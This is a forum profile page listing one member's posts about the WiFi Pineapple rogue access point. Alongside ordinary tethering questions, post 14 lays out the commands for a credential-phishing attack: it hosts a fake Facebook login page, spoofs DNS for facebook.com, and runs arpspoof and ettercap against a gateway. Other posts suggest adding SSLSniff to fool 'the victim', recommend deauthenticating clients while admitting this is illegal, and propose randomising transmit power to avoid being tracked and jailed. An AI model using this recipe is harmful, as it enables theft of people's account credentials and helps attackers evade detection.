Jump to content

Andrei0427

Active Members
  • Posts

    41
  • Joined

  • Last visited

About Andrei0427

  • Birthday 04/27/1995

Profile Information

  • Gender
    Male

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Andrei0427's Achievements

Newbie

Newbie (1/14)

  1. I was reading through one of stackexchange's child websites and searched 'wifi pineapple' for kicks to see what would come up. I came across this thread saying that the pineapple's radio transmissions could be easily tracks with some software or specialized hardware as indicate in the thread.. http://security.stackexchange.com/questions/10783/tracking-down-a-rogue-access-point this got me thinking as how to mitigate it as if one was to get caught, he would face jail time (obviously) much like this scenario: http://nakedsecurity.sophos.com/2012/07/16/seattle-cybercrime-trio-sentenced-for-3m-hacking-spree-via-wifi-and-malware/ Anyways, back to my point.. would be possible to setup a daemon that runs on the pineapple which is simply a bash script randomizing 'iwconfig wlan0 txpower XX' variables and applying them to the interface? At first it seems like the way to go but im not too sure about having the pineapple's cpu and interface hard at work the whole time changing the transmit power. Any thoughts on this? I can imagine that this could be easily created as an plugin, or 'infusions' as we call them here :) Regards, Andrei
  2. I doubt any form of reaver-WPS is possible on the N900, although I have come across some python scripts that came close, they just had some small issues that made it not work. Im not sure if the author updated them. :P Id link to the source but it has been a long time since I seen them :/ Although a little googleing should take you to them ;) Good luck! Andrei
  3. Thanks for the information! I do not have that much knowledge regarding the OpenWRT platform and how it works as regards treating USB devices. Just a question.. once you have the usb0 interface, did you give it an IP, defaultGW on both the phone and pineapple? And if so are they pingable with each other? If you achieved this step I imagine a couple of iptables rules and it should work. Not forgetting ip_forwarding of course :) Thanks again, would really like to see this idea work as it would eliminate the laptop in it's usage.
  4. I already posted a question but it seemed to be for a specific device so I decided to collect what I think a bunch of 'variables' that should help me to tether internet to the pineapple from my phone. Here we go :): 1) Is it possible to change the default SSID from pineapple to something else upon start up? 2) [!] Is it normal for the Karma log to list clients what have disconnect too? <Maybe it is not updating?> 3) Is is possible to bring the USB0 interface up / configure it manually using ifconfig usb0 172.16.42.1? IE changing the default gateway IP from the PoE/LAN interface to the USB? If so, how is this achieved? 4) Furthermore, considering I plan to use my phone as an internet provider, will the gateway be the pineapple? Since its providing the DHCP or the phone since its providing internet? Having said that is sharing the SDCard on the phone to the pineapple? Sorry for all the questions but I have big plans for this if all of the above is possible. Regards, Andrei
  5. Ive managed in the past to utilise the N900 in order to act as a USB wireless modem for my laptop when Im in dire need of battery life, I was thinking and wondering if this is possible with the Pineapple? Having this convenience will greatly improve concealing the device as SSHing to the pineapple can easily be done, and providing internet makes it all the better! I have already attempted this but had no luck getting the usb0 interface up <I dont even know what its called xD> Although my N900 has the capability to set a default GW, and its own IP address to the usb0 interface, in addition to echoing '1' to ip_forward. Has anyone managed or has the knowledge to accomplish this task? I know for certain that it's easier than having a 3G modem attached to it config. wise. All I need to know is how can I at least ping my phone through it's 172.16.42.42 IP from the pineapple, although further guidance is appreciated :). Regards, Andrei
  6. If I understood your question, you cant deauth and use karma on the same interface, you will need a laptop or mobile to do the deauth
  7. try using winSCP, its got a nice gui to it too ;) Good luck
  8. You need to echo 1 into the ip_forward. Also, try type arp -a into a cmd in windows and check if the MAC of the default gateway matches your 'attack' pc.
  9. Just use mdk3, Ive been having problems myself with AirDrop-ng couldnt find a solution
  10. Yes, using mdk3's ('d' function) on a seperate device and loading a whitelist to remove the pineapple's BSSID :)
  11. Make sure the AP's saved on your android phone are set to connect automatically when it's in range. Other than that I dont know what else can be wrong :/
  12. Clients will need to be probing for a connection in order for karma to pick them up, if theyre connected to a network already they wont be probing so it wont work. Try a de authentication attack to one of them if you do not have physical access to them <Illegal> and see if it works.
  13. Sure, would save me some time too to figure it all out, Id also love to see other ways to implement this :) Thanks
  14. Note: Since I do not have my pineapple yet, I only can help so much as to websever setup.You probably can use the steps from the RockRolling Pineapple episode to setup the redirection. This is what I did on a laptop running Backtrack: EDIT: Kinda looks shit on all browsers other than Chrome :/ 1) Place contents of: http://www.mediafire.com/?o1t637acat6a116 into /var/www/ 2) Append dns_spoof for ettercap with: facebook.com A webServIP 3) Start up webserver: service apache2 start 4) Run arpspoof <arpspoof -i wlan0 192.168.1.254(GW IP)> 5) Run ettercap with: ettercap -Tqi wlan0 -P dns_spoof NB: The etter_dns file will need some searching to find, for some reason it changed when I upgraded distro but its in /usr/local/share/ettercap/etter.dns I apologize once again for not being able to provide instructions for the pineapple, although once I learn how to do this on it ill post the new instructions :)
  15. Most of the time yes, it would be cached but if the client has just connected to the network it would refresh the DNS server with your spoofed one. <I imagine you would have this pre-configured with the pineapple> EDIT: I noticed what you meant with the IP block, that account isn't mine but he logged in from a local network I was in so this didn't matter really :P Indeed I have and it still works! Facebook probably uses the GeoLocaction of an IP rather than the block to track it, would be a pain to reset your password if you log in from a different ISP but within the same region. ------------------------------------------------------------------- Im thinking of adding that SSLSniff you mentioned to the log in page to add more validity to it, although its up to the victim to enable SSL on his profile. The only obvious give away is the ping.. I guess theres no way to escape it.. Glad you found it useful :)
×
×
  • Create New...